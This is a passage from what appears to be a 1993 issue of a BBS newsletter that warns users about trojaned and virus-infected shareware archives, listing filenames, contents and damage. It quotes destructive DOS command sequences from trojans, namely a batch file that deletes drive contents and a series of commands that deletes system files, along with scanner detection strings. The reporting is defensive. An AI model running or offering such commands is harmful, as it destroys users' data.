  program, v4.11.  Winfred himself has confirmed that an internal
  self-extracting archive, VESA.EXE, which is part of the archive TM411-4,
  contains two files that are infected with the Butterfly virus.  These
  files, in the archive subdirectory OAK, are 37VESA.COM and 67VESA.COM.
  The infection can be detected by F-Prot v2.08a.

  Winfred has since distributed a replacement archive, TM411-4A, which does
  not contain these files.  (This has now been superseded by a new
  version, TM412-1 through TM412-4.)  He has asked that anyone who has the
  infected archive delete it and replace it with the newest version. He
  also stresses that neither Telemate or GIFLink (part of the Telemate
  package) are infected - only the two VESA drivers.

  Winfred has since informed me via HW Richard Steiner that the same VESA
  drivers are present in the files GIFLK110 and GIFLK111.  He has asked
  that these two archives be deleted and replaced with GIFLK112 (or the
  most current version).  GIFLK112 has a README.TXT file which mentions the
  infected VESA drivers inside the v1.10 and v1.11 files.

  He also states that he has traced the infection back to an isolated
  incident of an infected copy of LIST77B.  He was unable to say for
  certain where this copy originally came from.

  Editorial - as I've said before, it takes a lot of courage for an author
  to publicly announce such a problem with their software.  Winfred Hu is
  to be commended for his handling of this situation, and for the prompt
  action he has taken to resolve it.

  Gary Marden (2:258/27) has located a Trojan version of a file that was
  quite popular last year - USRPATCH.  This was originally distributed as a
  "patch" to the ROMs of a certain modem that would take advantage of a bug
  left in the ROM chips in order to upgrade the modem to faster speeds.

  However, this Trojan takes advantage of your system instead of your
  modem.  At first look, it appears to be a mutation of the BILLNTED Trojan
  reported last year by David Elkins (2:254/78).  Gary says that it acts
  more like the QOUTES Trojan reported later in this section.  It displays
  the following messages once you invoke the internal USRPATCH.EXE file:

      Please wait, extracting user files.Bill'N'Ted have begun their
         bogus journey...
      Bill'N'Ted have begun their bogus journey.
      Looks like an Evil Robot Bill'N'Ted have trashed your drive, dude!

  At this point, your prompt turns into a simple "C>".  If you press Enter,
  your screen displays the message, "So long, suckers!", and then clears,
  leaving you with a system that is quite useless.

  Gary's test, performed on an MFM drive, resulted in a hard drive with the
  first 128 cylinders low-level formatted.  This included the partition
  table, boot sectors, and FATs.  Repair is not possible using FDISK alone,
  since the first 128 cylinders remain inaccessible.  The only practical
  repair is to perform your own low-level format, followed by FDISK and a
  high-level format.

  Gary did not test this with an IDE drive, but I am willing to wager that
  he would have had the same results.  Repair would not have been as
  simple, however - unless you have some heavy-duty IDE utility software,
  you'd have to send your drive back to the manufacturer for a low-level
  format.  Most bogus indeed.

  HW Emanuel Levy forwarded a report from John Rose (1:106/6001) about
  FORUM30.  The file, according to John, was "cleverly disguised as a 'new
  BBS package'...."  However, John says it formatted both of his hard
  drives.

  Andrew Barnhardt (1:247/301) forwarded a post from Dom D'amato
  (1:141/510) about an Amiga Trojan/dropper in circulation.  The file,
  MCHECK, claims to be a modem test utility.  However, the original
  reporter, Luca Spada (2:331/106.0), states that this file reports that
  your modem is "OK" even if no modem is attached to your system.
  Apparently, the Trojan monitors the keyboard for activity - if you leave
  it alone for 5-10 minutes, it begins to overwrite random tracks on your
  hard drive with endless obscenity.  Luca says it can reduce all of your
  partitions to garbage in about 4 seconds.

  Another unidentified user reported that the Trojan looks for the presence
  of an antiviral background program called SnoopDos - if it finds it, it
  deactivates it.

  The archive contains these two files:

       Modemcheck.doc    2227 Bytes
       Modemchecker     15516 Bytes

  Definitely sounds like one that Amiga users should avoid.

  HW Ken Whiton forwarded a message from Wildnet user Kevin Tischler about
  an incident of a tampered version of the AVScan antiviral tool, AVSCAN83.
  This file supposedly contains an internal file called VIRUS.DAT, which is
  "sometimes unzipped" by the host program, leaving five files behind.
  These five files are 911.COM, YANKEE.COM, SYSLOCK.COM, ANTHRAX.COM, and
  "a program reporting to be an icon viewer/maker called rim300.zip."
  Kevin reports that MicroSoft AntiVirus (part of MS-DOS 6.0) was able to
  detect the infection - from the way it looks, the first 4 files are the
  real things.

  Ryan Thompson (1:124/2213) reports that one of his users found a file
  calling itself ARJ240, claiming to be the non-beta release of the next
  ARJ archiver.  This immediately trips a flag, since the author of ARJ,
  Robert Jung, has publicly stated that there would never be a version with
  this number (due to an earlier hack by the same name).

  In any case, the file appears to be not merely a hack, but a simplistic
  Trojan.  The program that was altered to do the damage was REARJ.EXE.
  When Ryan's user ran it, it copied a file called SINBAUD.EXE to the root
  directory and re-wrote the user's autoexec.bat file to invoke this file.
  The SINBAUD file, according to Ryan's inspection, contained "a few
  hard-coded CHKDSK messages, some stuff for displaying a fake DOS prompt",
  and a few other messages.  He did not run the SINBAUD program, which is
  just as well - the overwrite of the autoexec.bat is enough to merit
  Trojan status.

  As many of you might know, The Hack Report does not include listings of
  programs designed to "crack" or "register" other programs.  I feel that
  these files don't need the free publicity that they would get from a
  listing in this report, and that the act of listing might make someone go
  out looking for a copy of one of them.  (See Ray Bradbury's short story,
  "Downwind from Gettysburg," from the collection "I Sing the Body
  Electric!", for an insight to your Hack Squad's thinking on this
  subject.)

  However, a report from David Jones (1 @ 2950 WWIVnet, Internet address
  87-2950@wwiv.tfsquad.mn.org) merits an exception to this rule.  He has
  found a file called RPIT352C, a copy of the online game "The Pit" with a
  "special program that will automatically register it for you."  Inside
  the archive is a README.COM file that is infected with the Leprosy virus.

  This is a good reason to not even download these "cracks" - you never
  know what you're getting into.

  Rod Fewster (3:640/886) reported in the FidoNet VIRUS Echo on a file
  called TNN202 that he tested.  This file apparently contains at least 3
  files named TNN.EXE, TNN.OV1, and TNN.OV2.  TNN.EXE displays the
  following message:

       TNN Anti-Virus (C) 1992-1993 by Syn Labs Inc. Version 2.02.
       Configuring, Please wait....

  At this point, the program renames TNN.OV1 to TNN1.EXE, and TNN.OV2 to
  TNN2.COM.  According to Rod, TNN1.EXE is the "RABID" Trojan, while
  TNN2.EXE is the Beta 1 Trojan.  RABID "whacks out your HD's boot sector,"
  apparently filling it with a rather obscene message.  The Beta 1 Trojan,
  on the other hand, executes the following sequence of commands:

        C:
        CD DOS
        DEL COMMAND.COM
        CD\
        DEL COMMAND.COM
        RENAME AUTOEXEC.BAT TEMP.BAT
        RENAME CONFIG.SYS AUTOEXEC.BAT
        RENAME TEMP.BAT CONFIG.SYS
        CD DOS
        DEL *.EXE

  It then displays its own obscene message on your screen.  Rod says that
  TNN.EXE then displays the following message (edited for television):

        GOODBYE D*******. Wave Ta-Ta to your hard disk.
        Next time, dont enter messages to a public echo if you have
        no idea what you are talking about.
        Love David Humes.

  Rod's results show that TNN.EXE is simply a "loader" for the two Trojans,
  and not dangerous by itself.  He also states that there are other files
  used to "pad out the archive," which are ancillary files from a program
  called VirusBuster v3.91.

  Thanks to Rod for posting his results.  This was definitely a nasty
  little beggar of a Trojan.

  HW Hinrich Donner forwards reports from Zone 2 of a "trainer" for the
  game Strike Commander which doesn't appear to act as it should.  The
  archive was distributed under the filenames SCTRNUNT and SC-TRN.
  SCTRNUNT contains the following files:

             !HIREZ   COM      6888 19.04.93   23:26
             SCTRNUNT EXE      6442 18.04.93   12:49
             UNT      EXE     11431 18.04.93   12:30
             SILVER   NFO        81 19.04.93   23:26
             SWIFT    NFO      3785 18.04.93   12:12
             UNT      NFO     11483 18.04.93   12:26

  Note that the SC-TRN archive contents were not forwarded, but the
  following file size and description were:

         SC-TRN.ARJ     9129 Strike Commander - Trainer by [UNT]

  The file which appears to do the damage, SCTRNUNT.EXE, does so by
  destroying your root directory, partition table, FAT1, and FAT2.

  Teo Chee Kian (6:600/600) received a file called GIF_TSR which claimed to
  convert .gif files to "Photo-like Graphics."  However, the file is
  actually a compiled batch file which seeks out and deletes all
  "important" files in your DOS, QEMM, WINDOWS, STACKER, and some other
  directories.  It also deletes MSDOS.SYS, IO.SYS, COMMAND.COM, CONFIG.SYS,
  and AUTOEXEC.BAT - it calls ATTRIB.EXE to remove the hidden, system, and
  read-only attributes when necessary.  Definitely a file to avoid.

  Emmanuel Bataille (2:320/7) forwarded a message from Serge Ayotte
  (Internet, rider@geolser.login.qc.ca) about a possible isolated incident
  of an infected copy of the BNU FOSSIL Driver, version 1.88 beta
  (BNU188B).  The archive Serge found was infected with the Screaming Fist
  650 virus.  Serge goes on to say that the infection is detectable by
  version 104 of McAfee's ViruScan, but not by version 102.

  Rod Fewster (3:640/886) reports that there are two other dangerous
  versions of BNU, under the filenames BNU200 and BNU202 (see also the
  "Hacked Files" section of this report).  He says that they are identical
  except for differences in the documentation files and internal messages,
  and that both attack your hard drive's partition table and master boot
  record (MBR).

  Note that there is a real version 1.88 beta of BNU, but it was not
  intended for public release, according to the author of BNU, David
  Nugent.  The latest official public release of BNU is v1.70.

  HW Nemrod Kedem (2:403/138) reports that a new Trojan has been found in
  Israel, named RASPEED.  He forwards the following archive information:

  Archive:  RASPEED.ARJ

  Name        Length   Method    SF  Size now Mod Date   Time     CRC
  =========== ======== =======  ==== ======== ========= ======== ========
  RASPEED.EXE    29120 Comp-1    37     18242 21 May 93 08:51:14 B9717331
  RASPEED.DOC     4344 Comp-1    66      1443 21 May 93 12:46:36 194BB7EB
  FILE_ID.DIZ      611 Comp-1    57       262 20 May 93 10:13:48 0E680542
  =========== ======== =======  ==== ======== ========= ======== ========
  *total    3    34075 ARJ 4     40%    21310 29 May 93 21:16:56

  The program is aimed at RemoteAccess BBS Systems - it copies the
  USERS.BBS file over to a file called JACKLINE.GIF located in the first
  file area listed in your FILES.RA file.  It also adds a description to
  the FILES.BBS file that reads "JACKLINE.GIF (640x480x256)".

  This program works with RA v1.11, but not with RA v2.00 gamma.  A full
  text of Nemrod's results can be found in the file RASPEED.RES, part of
  the FILETSTS.LZH archive found in the archive version of The Hack Report.

  David Snider, a user of Douglas Taylor's system (1:147/1077), reports via
  the FidoNet DIRTY_DOZEN echo on a file called BRE0911.  Apparently, a
  file inside this archive called UPDATE.COM is infected with a virus (no
  name given) which David says is only detectable by MS-DOS 6.0's VSAFE
  program.  The virus in question re-writes your COMMAND.COM file, adding
  to it slowly over a period of time:  a fellow sysop who was infected for
  8 days wound up with a COMMAND.COM file over 70K in size.

  According to David's report, there is a legitimate release of this
  program, under the filename BRE0910.  He did not describe what the real
  program was, however, nor did he provide any archive statistics.  All he
  said was that "nothing above BRE0910 is legal".  Shawn McMahon
  (1:206/1701.66) says that this sounds like "Barren Realms Elite," a BBS
  door game.

  Now, some info on a DEBUG script forwarded by Jack Cross (1:3805/13) from
  the FidoNet BATPOWER echo.  The script, which has generated a great deal
  of discussion, created an archive (LZH) of the program TinyCache
  (filename TNYCACHE), claiming to be a small disk cache.

  As soon as the script was posted, folks started reporting symptoms of
  destructive activity:  destroyed FATs and reformatted hard drives were
  been reported after this program was run.

  Prior to the publication of the April edition of this report, I tried a
  feeble attempt at analyzing this program myself.  However, as I have said
  before to folks who contact Hack Central Station, I'm a reporter, not an
  AV expert.  So, I forwarded a copy of this script to HW Jeff White of The
  Pueblo Group for testing.  Others ran their own tests, and still others
  forwarded the resulting archive for further testing.  The reports (which
  are _far_ too numerous to credit in their entirety - please accept my
  thanks for your help!) had some similar results, but left some confusion
  as to what this file actually is.

  All of the reports indicate that the unarchived file, TNYCACHE.COM, is
  compressed with PKLite and that the PKLite ID header was edited out of
  the resulting file.  Once decompressed, McAfee's SCAN reported that the
  file was infected with the Taiwan3 [T3] virus, and Frisk's F-Prot
  detected the AnitCAD virus.

  This is where things get wierd.  Bill Dirks (1:385/17) reported that
  there were two versions of the file - TNYCACHE.EXE and TNYCACHE.COM.  He
  also said that the .exe version is actually a renamed copy of the SCCHECK
  Trojan, and that the .com version is "hacked to include a hacked version
  of the AntiCAD virus."

  Bill included the following scanner strings for use with McAfee's SCAN:

              "2BC00221200961642E6578652004" Pklited-Anticad
              "46048B4E068B56088B5E0CCD261B" Sccheck-Trojan

  The second string can also be used with Frisk's F-Prot as a user string,
  as long as you inform the program that it is a .com/.exe infector.

  However, Bob Stettina, a user at 1:382/77, had a different analysis of
  this file, based on a report he says he received from Spencer Clarke of
  McAfee Associates.  Bob also decompressed the PKLited .com file and
  received a Taiwan3 [T3] report from McAfee's SCAN v102.  After this, he
  uploaded the file to McAfee Associates.

  The report received from Mr. Clarke said, according to Bob, that this
  file is "a unique/new Trojan, and it is *NOT* actually infected with a
  virus:  rather, this Trojan includes a segment of code that is
  accidentally 'recognized' by SCAN as the Taiwan3 virus."  The report also
  stated that other scanners gave off false alarms on this file.  Finally,
  Bob goes on to say that this file does not replicate:  since the ability
  to reproduce is part of the basic definition of a virus, Bob concludes
  that this one fails that test and is therefore a Trojan.

  HW Jeff White's test results tended to agree with the majority of the
  reports:  the .com file was simply infected with the Taiwan3 [T3] virus,
  and was capable of being "cleaned" by McAfee's Clean-Up v102.

  This has been a fascinating study in program analysis.  Unfortunately,
  the story does not end here.  Oliver Bladek (1:134/49) has found the file
  posted as an archive on a BBS under the filename TNYCACHE.  The file
  exhibited the same symptoms reported above.  It would seem, therefore,
  that whatever the program actually is, be it virus, Trojan, or whatever,
  it has been re-created from the DEBUG script by someone, not run on their
  system, and later absent-mindedly uploaded as an archive to a BBS.  If
  you see this file, make sure it's the same one we're talking about here:
  if it is, delete first and ask questions later.

  Andy Thomas (1:125/217) forwarded a report from Allan Thomas (Smartnet
  Virus Conference) about an infected copy of the archive BBSLAWS.  The
  archive contained two files - NEWLAWS.TXT and README.COM.  The .txt file
  seemed to be for real, but the .com file was another story.  According to
  Allan, the program displays the following message just before it locks up
  your system:

      "Install v1.0 (c) Vivid Imaginations, Ltd.  All rights reversed."

  As Allan points out, note the spelling of the last word in the above
  quote:  quite subtle.  The damage you will find after you reboot is not
  so subtle, though - the program at least overwrites your MBR and 1st FAT,
  deletes itself, and overwrites the remnants of itself with garbage to
  hide the evidence.  When it overwrites itself, it writes enough bytes to
  cover every sector it used to occupy, resulting in a write of more bytes
  than the original file size.

  Paul Harney (1:107/579) forwarded a message from a user, Rod Fewster,
  concerning a sighting of something claiming to be PKZip v2.04I.  The
  file, a self-extracting archive called PKZ204I, shows a "valid"
  authenticity verification on unpacking.  However, Rod says both the
  internal files PKZIP.EXE and PKUNZIP.EXE "whack out your CMOS settings
  totally as soon as they're run."  No other damage was reported.

  Here are the vital stats, as provided by Rod:

        "Archive date is 02-22-93 20:35.

        "All files are dated 02-22-93 02.04 except pkunzip.exe
         which is dated 02-22-93 20:34."

  Rod also provided a comparison between v2.04g and this file's
  executables:

        "v2.04g filesizes are:  pkzip.exe 42166   pkunzip.exe 29378
         v2.04i filesizes are:  pkzip.exe 42186   pkunzip.exe 29398"

  Chuck Gustafson (1:2201/33) forwarded to the FidoNet echo DIRTY_DOZEN a
  report from Brian Buchanan (Brian Buchanan #1 @8251 VirtualNET) about the
  file FDFORM.  This appears to be an isolated incident of a Trojan version
  of the legitimate program FDFormat.  The .zip archive was only 13106
  bytes long, and contained the files FDOCS.PAK (317 bytes), FDFORMAT.PAK
  (11366 bytes), and FDSETUP.BAT (174 bytes).  The .bat file contains the
  following commands:

                  @echo off
                  cls
                  echo Analizing system configuration...
                  @echo off
                  ren fdocs.pak fd.exe
                  echo Unpacking files...
                  echo (This may take a few minutes)
                  fd c:\
                  fd d:\
                  fd e:\

  The problem here is that the file FDOCS.PAK is actually a renamed copy of
  a program called NHUE, which according to Brian is a utility that deletes
  all files and sub-directories in the directory specified on the command
  line.  If you look at what happens in the .bat file, you'll note that
  NHUE, originally renamed FDOCS.PAK, is re-renamed to FD.EXE and is called
  for drives C: through E:, potentially wiping out everything on these
  drives.

  Lee Noga (1:3618/23), apparently one of the folks associated with the
  PowerPak Gold '92 Shareware CD-ROM disk, asked that I help warn folks of
  a Trojan file on their disk called MWARS20.  This file, which has been
  seen in other locations, contains two files, DEMO.EXE and READTHIS.COM,
  which appear to be the main culprits.  According to a report from Scott
  Catterill (Intelec PC-Security conference, via HW Bill Lambdin and based
  on info from Dave Comeau), both files contain the following text:

    eat this. REVENGE!. Melting Memory!. Maybe next time, you won't steal
    people's Passwords and get them ****** off at you... I hope you backed
    up your hard drive!

  Scott says both will try to low-level format your hard drive.  However,
  according to Lee Noga's report, the program acts a bit differently.  The
  copy on the PowerPak CD-ROM contains the following files:

                       MWARS.BAT      128     07/17/92
                     MWARS20.EXE    15864     02/15/92
                     MWARS20.DOC     2058     07/17/92
                        NOTE.DOC      309     01/01/80
                         YANG.ME      121     07/17/92
                     INSTALL.EXE    39080     06/14/90
                        DEMO.EXE     5470     04/22/90
                     DOMENOW.COM      937     09/24/90
                    READTHIS.COM     5470     04/22/90

  Lee says the program does its damage via the .bat file, via DEMO.COM, and
  via DOMENOW.COM - all three are dangerous, as they will scramble your
  hard drive's FAT table.  The same message as Scott reports will appear,
  but if you reboot during its display, you may be able to abort the
  Trojan's damage.  Lee also notes that the game itself was untouched:  if
  you don't invoke it via the .bat file, it will run just fine.  Bizarre.

  (Editorial - I appreciate the effort taken by vendors to inform the
  public of a problem with their product.  Even if the publicity hurts
  sales, the loss can't be worse than the potential loss caused by a
  perception that a company doesn't care about whether or not their product
  is dangerous.  This is not an indictment of _any_ company or author:  it
  is merely intended to encourage companies and authors to report attacks
  against and/or problems with their products as soon as they learn of
  them.  My life would be _so_ much easier. <g>  -lj)

  Tom Guelker (1:2250/26) posts in the FidoNet DIRTY_DOZEN echo a report of
  a Trojan called SINBAD.  It claims to be a file transfer protocol
  utility, but it actually throws your system into a perpetual loop by
  overwriting your AUTOEXEC.BAT file.  The new AUTOEXEC.BAT (as well as
  SINBAD.EXE) becomes read-only and invokes SINBAD.EXE, which again
  overwrites AUTOEXEC.BAT with the same info (apparently turning off the
  read-only bit first <?>), etc. ad nauseum.  Definitely sounds irritating,
  but not dangerous unless you don't have a copy of your original
  AUTOEXEC.BAT file:  you can bypass the loop by booting from a known
  clean, write-protected system disk, and then use a utility such as the
  MS-DOS 4.01 and above ATTRIB.EXE to remove the read-only bit.  This will
  allow you to delete the offending .bat file and replace it with a copy of
  your original, or to re-write it if you didn't have a backup.

  Henry Shaw (1:261/1177, via Jack Cross, 1:3805/13) reports on TAGCRASH, a
  supposed utility or crack of some sort for TAG BBS systems.  Henry says
  the archive contained the internal file TAGUTIL.COM, which started off in
  your \BBS directory and "worked its way through the obvious choices of
  \TAG and \MULTI till it found all the .DAT files, .LST files and
  everything else that pertained to a TAG board."  These files would be
  deleted when found.  An easy way to trash a TAG system, Henry says.

  HW Richard Steiner forwarded a message from the ILink Shareware_Support
  conference by Bob Feldman concerning an archive named HSDIAG.  Bob stated
  that this file is a Trojan.  Bob posted further details on the ILink
  Virus conference (forwarded by HW Bill Lambdin), and also sent a copy of
  the file to R. Wallace Hale, SysOp of the Driftnet BBS ((506)325-9002).
  Mr. Hale did preliminary testing of the file, and was able to determine
  that it will at least try to overwrite the first 255 sectors on the first
  eight drives in a system, including floppy drives.  For the full text of
  Mr. Hale's report, as forwarded by HW Bill Lambdin and James FitzGibbon
  (1:250/301), please obtain the archive version of The Hack Report and see
  the file HSDIAG.RES, located inside the internal archive FILETSTS.LZH.

  HW Jeff White received a file for testing called ANSIVIEW.COM, which has
  apparently been seen inside a couple of archives, most often ANSI
  collections.  The copy Jeff received for testing is infected with the
  AIDS [N1] virus, and cannot be disinfected by either McAfee's Clean-Up or
  the AIDSOUT utility.  The infection is detectable by McAfee's SCAN.  Yet
  another of The Hack Squad's 2048 reasons to check everything you download
  for viruses.

  HW Scott Raymond has cleared up a discrepancy that I had in previous
  reports concerning the file BWAVE_3.  This was listed as a hack of the
  Blue Wave Offline Reader, but according to the report received by Scott
  from a user in Australia, the file is actually a Trojan.  The user in
  Australia reported that the Trojan trashed partitions and boot sectors,
  in addition to attacking RemoteAccess BBS data files.  According to
  Scott, this is the same file reported by Frans Hagelaars (2:512/2).
  Please note that this Trojan was discovered prior to the release of
  BWAVE212, version 2.12 of the reader.

  More Australian sightings come from Greg Miller (3:711/454), via HW
  Emanuel Levy, and Nigel Hunt (3:712/218).  No archive name was given, but
  the file again claimed to be version 3.0 of Blue Wave.  It didn't exhibit
  any dangerous behaviour, but it does seem to at least be related to the
  above file:  it doesn't do QWK packets (v2.12 does), and it has no delay
  screen for unregistered users.

  Vincent Aniello (aniello@gauss.rutgers.edu) reported a "back door" for
  use when logging onto Renegade BBS systems.  This file, RGBACKDR, claims
  to allow you to log onto any Renegade board with SysOp privileges.
  Instead, it makes a beeline for several key files on _your_ system and
  deletes them.  For the full text of the test results, as performed by HW
  Jeff White of The Pueblo Group, see the file RGBACKDR.RES in the archive
  FILETSTS.LZH, found in the archive version of The Hack Report.

  Maynard Marquis (1:141/328) forwarded a message to the FidoNet Int'l Echo
  WARNINGS from Joel Lambert about a file called TW-CHEAT.  This claims to
  be a cheat file for Tradewars 2002, and contains the following files:

                  TW-CHEAT EXE      6306 03-09-93   9:47p
                  SIN      COM       535 03-09-93   9:47p

  He did not say which file he ran, but one of these displayed "some
  unrelated menu" and then returned to DOS.  Apparently, Joel later
  rebooted, at which point the BOOTSAFE program (part of Central Point
  Antivirus) reported that his system had been infected with the Tequila
  virus.  Fortunately, he was able to remove the infection.  He hopes.  I
  hope so too, for his sake.

  Michael Heinbockel (2:242/316) found a file on a BBS in Hamburg, Germany,
  called PARITY.  This file renames your AUTOEXEC.BAT file to AUTOEXEC.BAK,
  creates a new AUTOEXEC.BAT file with the single line C:\DOS\PARITY.EXE,
  and then tries to copy itself to your C:\DOS\ directory.  It usually
  hangs the system during the copy attempt, resulting in the file not being
  copied.  It may be a Trojan that doesn't work, but it is still a Trojan.

  Several reports came in on yet another Trojan attack against McAfee's
  SCAN - this time, under the filename SCANV103.  The first report came via
  Eugene Woiwod (Eugen_Woiwod@mindlink.bc.ca), and full test results were
  later received from Bill Logan of The Pueblo Group (via HW Jeff White).
  As a result of this Trojan, McAfee Associates decided to skip version
  number 103, using number 104 as the release which followed SCANV102.  For
  a full text of Bill's test results, see the file SCANV103.RES in the
  archive FILETSTS.LZH, found in the archive version of The Hack Report.

  Staale Fagerland (staale.fagerland@euronetis.no) reported a file called
  CES_402, which claimed to be an antiviral program.  However, the archive
  contains two files (CES.COM and DONT_!) which are quite suspicious.
  Staale ran the CES.COM file through a program called CHK4BOMB and
  discovered that it uses ROM BIOS routines for direct disk access.  The
  file DONT_! contains several messages that relate to corrupting your FAT,
  partition table, etc., and the message, "Mate(s), it simply makes sense,
  make a backup...".

  Ashley Kleynhans (5:7101/55) reports a Trojan called DREAMDEM, which
  claims to be a demo of some sort by a computer group.  According to
  Ashley, the group named in the file descriptions is not responsible for
  creating this Trojan.  When run, the file displays several messages,
  including ones like, "found PC Speaker," "Found porno GIFs," etc., and
  finally asks whether or not you have a sound card.  Ashley answered Yes
  to this question, and received the response, "OH by the way, I trashed
  your hard disk about a minute ago."

  Ashley immediately did a DIR command on the C: drive and saw no immediate
  damage.  However, the entire disk was gone after a system reset.  Ashley
  says this is because the Trojan deletes both your hard disk partition
  table and your boot sector.  I'm not sure if this is right, but I
  wouldn't want to try it out on my system to verify Ashley's findings.

  Here is the internal file info:

                  CHECKANS COM      3585 03-10-93   2:43p
                  VGADEMO  EXE      8892 04-17-93   7:45p
                  START    BAT        17 04-17-93   1:33p

  Ian Douglas (5:7102/119) forwarded further information on what appears to
  be the same file from a report by Shane Greyvenstein (5:7102/119).  This
  file, called VGADEM1, apparently managed to delete a lot of Shane's files
  before he could stop it:  fortunately, it doesn't appear to have trashed
  Shane's disk.  However, Shane's test revealed that the file was written
  using two packages called "IntroMaker v3.0" and "Mod-OBJ," but that the
  files are encrypted so that the copyright messages for these two packages
  are not visible until after they are decrypted by the host program.

  Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
  system was "taken down" by a file called DRAGON.  It claimed to be a
  Public Domain VGA and Sound Blaster supported game.  No symptoms were
  reported, except that he had to reformat his hard drive.

  Penny Nebrich (1:369/101) confirms this, saying that the program that was
  affected was one called Dragon's Shard.  She states that it "created what
  looked like infinite subdirectories with binary names of I think it was a
  dir name of 8 chars. McAfee's scan and Virucide just got stuck in an
  infinite loop. I had to reformat my drive."

  Bill Roark (RIME Shareware conference, via HW Richard Steiner) verifies
  that there is a legitimate file called Dragon's Shard, available under
  the filename DRAGON21.  He also states that the real program is not
  public domain, but shareware instead.

  So, what we have here would seem to be a pair of isolated incidents of
  an altered version of a legitimate program.  As the documentation Bill
  forwarded states, if you feel you have an altered copy of the program,
  contact the publishers with your information.  They can be reached at:

                           Bit Brother Software
                           c/o Michael Ramsey
                           #2 Winged Foot Way
                           Littleton CO 80123

  Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
  Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
  In what might be an isolated incident, Josh says the file claimed to be a
  "really cool game, VGA gfx and SB sound."  However, the INSTALL program
  destroys hard disks.

  Bob Seaborn received a copy of this file and forwarded it to me - I in
  turn forwarded it to Bill Logan and HW Jeff White for testing.  As it
  turns out, there is an internal file called SETUP.EXE that is identical,
  byte for byte, with the file INSTALL.EXE.  Both will trash your hard
  drive with amazing speed, according to HW Jeff White.  Also, the file
  PHYLOX.EXE is flagged as a possible infected file.  For a full text of
  the test results, see the file PHYLOX.RES in the internal archive
  FILETSTS.LZH, found in the archive version of The Hack Report.

  Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
  Pedersen, about ASM2PAS.  This claims to create Pascal source code from
  an .EXE file.  However, from text inside the executable, it appears that
  this program tries to delete your DOS directory.  It also brags about a
  certain anti-viral scanner not being able to detect it.

  Valid point, that:  practically _no_ anti-viral tools detect Trojans,
  with the exception of Frisk's F-Prot and one or two others.  Even then,
  the Trojan detection is not complete.  Your best protection against
  Trojans is a religiously maintained set of backups, preferably done after
  a check for viruses on your hard drive(s).

  HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
  forum about the file GEOCOMM.  The message, from "GW Steve" (a "GeoRep",
  according to Richard), came from a user of GeoComm named J. S. James, and
  warned that this archive contains a hacked version of the original
  GeoComm program.  The file claims to be an "update," but it seems to be a
  Trojan which will damage your File Allocation Table (FAT).  Not a file to
  be kept around, it would seem.

  HW Bill Lambdin reports on LAW22 (no description), which contains the
  following files:

       Length    Date    Time    CRC-32  Attr  Name
       ------    ----    ----   -------- ----  ----
        22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
        13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
          126  02-24-93  14:50  68c9463a --w-  DESC.SDI
       ------                                  -------
        36459                                        3

  Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
  which is a 160 byte-long .COM file infector.  This could be an isolated
  incident of an infected legitimate file, so thoroughly check any such
  file you find that has the above files in it before you kill it.

  Another report from Mr. Lambdin concerns a file that a user in the
  Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
  v2.04).  Bill's tests show that this copy of the archive contains two
  files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
  non-resident "companion" virus that utilizes the Mutation Engine.  It
  also contains the file PCS.EXE, which is infected with a virus created by
  a virus-writing group's "Mass Produce Code Generator."

  Bill also reports that our old friend, the Power Pump virus, has
  resurfaced inside a file called FX2.  Here's the archive info:

                Length   Date    Time    CRC-32  Attr  Name
                ------   ----    ----   -------- ----  ----
                 25846 01-01-92  00:00  2635e28a --w-  FX2.EXE
                  1199 01-01-92  00:00  f61885bd --w-  FX2.COM
                 17354 01-01-92  00:00  02eac55c --w-  POWER.EXE
                  1007 01-01-92  00:00  139e1291 --w-  FX2.DOC
                ------                                 -------
                 45406                                       4

  The giveaway here is the file POWER.EXE.  For a full documentation of the
  Power Pump virus, please see the 1992 Full Archive Edition of The Hack
  Report (filename HACK92FA), available from most official distribution
  sites.

  Travis Griggs (1:3807/8) forwarded a report from a local board called The
  Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
  message referred to a file called BOUNCE, which she said was infected
  with the Beeper (Russian Mirror) virus.  The file, according to Travis,
  claimed to be a game.  Travis has now forwarded the file information on
  this archive:

      Filename       Original DateTime modified CRC-32   Attr BTPMGVX
      ------------ ---------- ----------------- -------- ----------
      BOUNCE.COM         4053 80-01-01 00:02:04 35C562AF A--W B 1
      BOUNCE.DAT       119101 92-11-20 23:16:10 247712A8 A--W B 0
      BOUNCE.DOC          348 92-11-20 23:21:46 B28557FE A--W B 1
      ------------ ----------
          3 files      123502

  Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
  called BWE.  This claims to provide a "quick and easy way to exit
  Windows."  Geoffrey forwards this file info and disassembly report from
  John Eady (1:229/15, john.eady@canrem.com):

            Name          Length   Mod Date    Time     CRC
            ============  ======== =========  ======== ========
            LICENSE.TXT       2656 14 Feb 93  22:01:14 46B50814
            ORDER.TXT         2335 12 Feb 93  12:00:18 9D1A705E
            README.TXT        3565 14 Feb 93  23:08:08 3EA7548E
            BWE.EXE          19517 14 Feb 93  23:02:34 F1729CA4
            ============  ======== =========  ======== ========
            *total     4     28073 14 Feb 93  23:08:08

  "After debugging part of the virus, the following text appears (encrypted)
  in the infected program:

        It's time for a math test curtesy of YAM!

        And the question is...

        What is 00 + 00 =

        WRONG!!!! TRY AGAIN!

        Admiral Bailey

  "This virus is self-encrypting, but does not use any stealth techniques
  (as far as I've seen). It doesn't appear to infect the boot record, or
  the boot partition record. It does not appear to infect .SYS files, or
  .OV? files.

  "If you feel you have been infected, examine any EXE or COM files that you
  believe are infected. Check the 4th and 5th bytes in a COM file for the
  characters "BA". Check the 12th and 13th bytes in a EXE file for the
  characters "BA". If you find a file like this, chances are you have been
  infected."

  Mike Wenthold (1:271/47) found a program under the filename GS2000 which
  contained the VCL 3 [Con] Virus.  The archive contains the following
  files:

               Length    Date     Time    CRC      Filename
              ======== ========= ====== ======== ============
                  1984 22-Dec-91 01:40p 3527B16B GS2000.COM
                   543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
              ======== ========= ====== ======== ============
                  2527                           2 files.

  The compression method (on this ZIP archive) was not included in his
